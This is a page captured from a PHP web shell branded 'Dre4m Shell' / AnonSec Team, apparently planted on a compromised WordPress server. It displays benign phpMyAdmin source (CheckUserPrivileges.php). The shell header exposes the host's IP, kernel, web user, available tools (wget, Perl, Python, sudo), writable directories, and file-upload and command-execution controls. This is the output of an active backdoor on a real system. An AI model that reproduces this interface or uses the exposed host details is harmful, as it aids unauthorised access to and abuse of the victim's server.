Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 3.147.84.255
Web Server : Apache/2.4.61 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/wordpress/phpMyAdmin/libraries/classes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /var/www/wordpress/phpMyAdmin/libraries/classes/CheckUserPrivileges.php
<?php
/* vim: set expandtab sw=4 ts=4 sts=4: */
/**
 * Get user's global privileges and some db-specific privileges
 *
 * @package PhpMyAdmin
 */
declare(strict_types=1);

namespace PhpMyAdmin;

use PhpMyAdmin\DatabaseInterface;
use PhpMyAdmin\Util;

/**
 * PhpMyAdmin\CheckUserPrivileges class
 *
 * @package PhpMyAdmin
 */
class CheckUserPrivileges
{
    /**
     * @var DatabaseInterface
     */
    private $dbi;

    /**
     * Constructor
     *
     * @param DatabaseInterface $dbi DatabaseInterface object
     */
    public function __construct(DatabaseInterface $dbi)
    {
        $this->dbi = $dbi;
    }

    /**
     * Extracts details from a result row of a SHOW GRANT query
     *
     * @param string $row grant row
     *
     * @return array
     */
    public function getItemsFromShowGrantsRow(string $row): array
    {
        $db_name_offset = mb_strpos($row, ' ON ') + 4;

        $tblname_end_offset = mb_strpos($row, ' TO ');
        $tblname_start_offset = false;

        if (($__tblname_start_offset = mb_strpos($row, '`.', $db_name_offset))
            && $__tblname_start_offset
            < $tblname_end_offset) {
                $tblname_start_offset = $__tblname_start_offset + 1;
        }

        if (! $tblname_start_offset) {
            $tblname_start_offset = mb_strpos($row, '.', $db_name_offset);
        }

        $show_grants_dbname = mb_substr(
            $row,
            $db_name_offset,
            $tblname_start_offset - $db_name_offset
        );

        $show_grants_dbname = Util::unQuote($show_grants_dbname, '`');

        $show_grants_str = mb_substr(
            $row,
            6,
            mb_strpos($row, ' ON ') - 6
        );

        $show_grants_tblname = mb_substr(
            $row,
            $tblname_start_offset + 1,
            $tblname_end_offset - $tblname_start_offset - 1
        );
        $show_grants_tblname = Util::unQuote($show_grants_tblname, '`');

        return [
            $show_grants_str,
            $show_grants_dbname,
            $show_grants_tblname,
        ];
    }

    /**
     * Check if user has required privileges for
     * performing 'Adjust privileges' operations
     *
     * @param string $show_grants_str     string containing grants for user
     * @param string $show_grants_dbname  name of db extracted from grant string
     * @param string $show_grants_tblname name of table extracted from grant string
     *
     * @return void
     */
    public function checkRequiredPrivilegesForAdjust(
        string $show_grants_str,
        string $show_grants_dbname,
        string $show_grants_tblname
    ): void {
        // '... ALL PRIVILEGES ON *.* ...' OR '... ALL PRIVILEGES ON `mysql`.* ..'
        // OR
        // SELECT, INSERT, UPDATE, DELETE .... ON *.* OR `mysql`.*
        if ($show_grants_str == 'ALL'
            || $show_grants_str == 'ALL PRIVILEGES'
            || (mb_strpos(
                $show_grants_str,
                'SELECT, INSERT, UPDATE, DELETE'
            ) !== false)
        ) {
            if ($show_grants_dbname == '*'
                && $show_grants_tblname == '*'
            ) {
                $GLOBALS['col_priv'] = true;
                $GLOBALS['db_priv'] = true;
                $GLOBALS['proc_priv'] = true;
                $GLOBALS['table_priv'] = true;

                if ($show_grants_str == 'ALL PRIVILEGES'
                    || $show_grants_str == 'ALL'
                ) {
                    $GLOBALS['is_reload_priv'] = true;
                }
            }

            // check for specific tables in `mysql` db
            // Ex. '... ALL PRIVILEGES on `mysql`.`columns_priv` .. '
            if ($show_grants_dbname == 'mysql') {
                switch ($show_grants_tblname) {
                    case "columns_priv":
                        $GLOBALS['col_priv'] = true;
                        break;
                    case "db":
                        $GLOBALS['db_priv'] = true;
                        break;
                    case "procs_priv":
                        $GLOBALS['proc_priv'] = true;
                        break;
                    case "tables_priv":
                        $GLOBALS['table_priv'] = true;
                        break;
                    case "*":
                        $GLOBALS['col_priv'] = true;
                        $GLOBALS['db_priv'] = true;
                        $GLOBALS['proc_priv'] = true;
                        $GLOBALS['table_priv'] = true;
                        break;
                    default:
                }
            }
        }
    }

    /**
     * sets privilege information extracted from SHOW GRANTS result
     *
     * Detection for some CREATE privilege.
     *
     * Since MySQL 4.1.2, we can easily detect current user's grants using $userlink
     * (no control user needed) and we don't have to try any other method for
     * detection
     *
     * @todo fix to get really all privileges, not only explicitly defined for this user
     * from MySQL manual: (https://dev.mysql.com/doc/refman/5.0/en/show-grants.html)
     * SHOW GRANTS displays only the privileges granted explicitly to the named
     * account. Other privileges might be available to the account, but they are not
     * displayed. For example, if an anonymous account exists, the named account
     * might be able to use its privileges, but SHOW GRANTS will not display them.
     *
     * @return void
     */
    private function analyseShowGrant(): void
    {
        if (Util::cacheExists('is_create_db_priv')) {
            $GLOBALS['is_create_db_priv'] = Util::cacheGet(
                'is_create_db_priv'
            );
            $GLOBALS['is_reload_priv'] = Util::cacheGet(
                'is_reload_priv'
            );
            $GLOBALS['db_to_create'] = Util::cacheGet(
                'db_to_create'
            );
            $GLOBALS['dbs_where_create_table_allowed'] = Util::cacheGet(
                'dbs_where_create_table_allowed'
            );
            $GLOBALS['dbs_to_test'] = Util::cacheGet(
                'dbs_to_test'
            );

            $GLOBALS['db_priv'] = Util::cacheGet(
                'db_priv'
            );
            $GLOBALS['col_priv'] = Util::cacheGet(
                'col_priv'
            );
            $GLOBALS['table_priv'] = Util::cacheGet(
                'table_priv'
            );
            $GLOBALS['proc_priv'] = Util::cacheGet(
                'proc_priv'
            );

            return;
        }

        // defaults
        $GLOBALS['is_create_db_priv']  = false;
        $GLOBALS['is_reload_priv'] = false;
        $GLOBALS['db_to_create'] = '';
        $GLOBALS['dbs_where_create_table_allowed'] = [];
        $GLOBALS['dbs_to_test'] = $this->dbi->getSystemSchemas();
        $GLOBALS['proc_priv'] = false;
        $GLOBALS['db_priv'] = false;
        $GLOBALS['col_priv'] = false;
        $GLOBALS['table_priv'] = false;

        $rs_usr = $this->dbi->tryQuery('SHOW GRANTS');

        if (! $rs_usr) {
            return;
        }

        $re0 = '(^|(\\\\\\\\)+|[^\\\\])'; // non-escaped wildcards
        $re1 = '(^|[^\\\\])(\\\)+'; // escaped wildcards

        while ($row = $this->dbi->fetchRow($rs_usr)) {
            list(
                $show_grants_str,
                $show_grants_dbname,
                $show_grants_tblname
            ) = $this->getItemsFromShowGrantsRow($row[0]);

            if ($show_grants_dbname == '*') {
                if ($show_grants_str != 'USAGE') {
                    $GLOBALS['dbs_to_test'] = false;
                }
            } elseif ($GLOBALS['dbs_to_test'] !== false) {
                $GLOBALS['dbs_to_test'][] = $show_grants_dbname;
            }

            if (mb_strpos($show_grants_str, 'RELOAD') !== false) {
                $GLOBALS['is_reload_priv'] = true;
            }

            // check for the required privileges for adjust
            $this->checkRequiredPrivilegesForAdjust(
                $show_grants_str,
                $show_grants_dbname,
                $show_grants_tblname
            );

            /**
             * @todo if we find CREATE VIEW but not CREATE, do not offer
             * the create database dialog box
             */
            if ($show_grants_str == 'ALL'
                || $show_grants_str == 'ALL PRIVILEGES'
                || $show_grants_str == 'CREATE'
                || strpos($show_grants_str, 'CREATE,') !== false
            ) {
                if ($show_grants_dbname == '*') {
                    // a global CREATE privilege
                    $GLOBALS['is_create_db_priv'] = true;
                    $GLOBALS['is_reload_priv'] = true;
                    $GLOBALS['db_to_create']   = '';
                    $GLOBALS['dbs_where_create_table_allowed'][] = '*';
                    // @todo we should not break here, cause GRANT ALL *.*
                    // could be revoked by a later rule like GRANT SELECT ON db.*
                    break;
                } else {
                    // this array may contain wildcards
                    $GLOBALS['dbs_where_create_table_allowed'][] = $show_grants_dbname;

                    $dbname_to_test = Util::backquote($show_grants_dbname);

                    if ($GLOBALS['is_create_db_priv']) {
                        // no need for any more tests if we already know this
                        continue;
                    }

                    // does this db exist?
                    if ((preg_match('/' . $re0 . '%|_/', $show_grants_dbname)
                        && ! preg_match('/\\\\%|\\\\_/', $show_grants_dbname))
                        || (! $this->dbi->tryQuery(
                            'USE ' . preg_replace(
                                '/' . $re1 . '(%|_)/',
                                '\\1\\3',
                                $dbname_to_test
                            )
                        )
                        && mb_substr($this->dbi->getError(), 1, 4) != 1044)
                    ) {
                        /**
                         * Do not handle the underscore wildcard
                         * (this case must be rare anyway)
                         */
                        $GLOBALS['db_to_create'] = preg_replace(
                            '/' . $re0 . '%/',
                            '\\1',
                            $show_grants_dbname
                        );
                        $GLOBALS['db_to_create'] = preg_replace(
                            '/' . $re1 . '(%|_)/',
                            '\\1\\3',
                            $GLOBALS['db_to_create']
                        );
                        $GLOBALS['is_create_db_priv'] = true;

                        /**
                         * @todo collect $GLOBALS['db_to_create'] into an array,
                         * to display a drop-down in the "Create database" dialog
                         */
                         // we don't break, we want all possible databases
                         //break;
                    } // end if
                } // end elseif
            } // end if
        } // end while

        $this->dbi->freeResult($rs_usr);

        // must also cacheUnset() them in
        // PhpMyAdmin\Plugins\Auth\AuthenticationCookie
        Util::cacheSet('is_create_db_priv', $GLOBALS['is_create_db_priv']);
        Util::cacheSet('is_reload_priv', $GLOBALS['is_reload_priv']);
        Util::cacheSet('db_to_create', $GLOBALS['db_to_create']);
        Util::cacheSet(
            'dbs_where_create_table_allowed',
            $GLOBALS['dbs_where_create_table_allowed']
        );
        Util::cacheSet('dbs_to_test', $GLOBALS['dbs_to_test']);

        Util::cacheSet('proc_priv', $GLOBALS['proc_priv']);
        Util::cacheSet('table_priv', $GLOBALS['table_priv']);
        Util::cacheSet('col_priv', $GLOBALS['col_priv']);
        Util::cacheSet('db_priv', $GLOBALS['db_priv']);
    }

    /**
     * Get user's global privileges and some db-specific privileges
     *
     * @return void
     */
    public function getPrivileges(): void
    {
        $username = '';

        $current = $this->dbi->getCurrentUserAndHost();
        if (! empty($current)) {
            list($username, ) = $current;
        }

        // If MySQL is started with --skip-grant-tables
        if ($username === '') {
            $GLOBALS['is_create_db_priv'] = true;
            $GLOBALS['is_reload_priv'] = true;
            $GLOBALS['db_to_create'] = '';
            $GLOBALS['dbs_where_create_table_allowed'] = ['*'];
            $GLOBALS['dbs_to_test'] = false;
            $GLOBALS['db_priv'] = true;
            $GLOBALS['col_priv'] = true;
            $GLOBALS['table_priv'] = true;
            $GLOBALS['proc_priv'] = true;
        } else {
            $this->analyseShowGrant();
        }
    }
}

Anon7 - 2022
AnonSec Team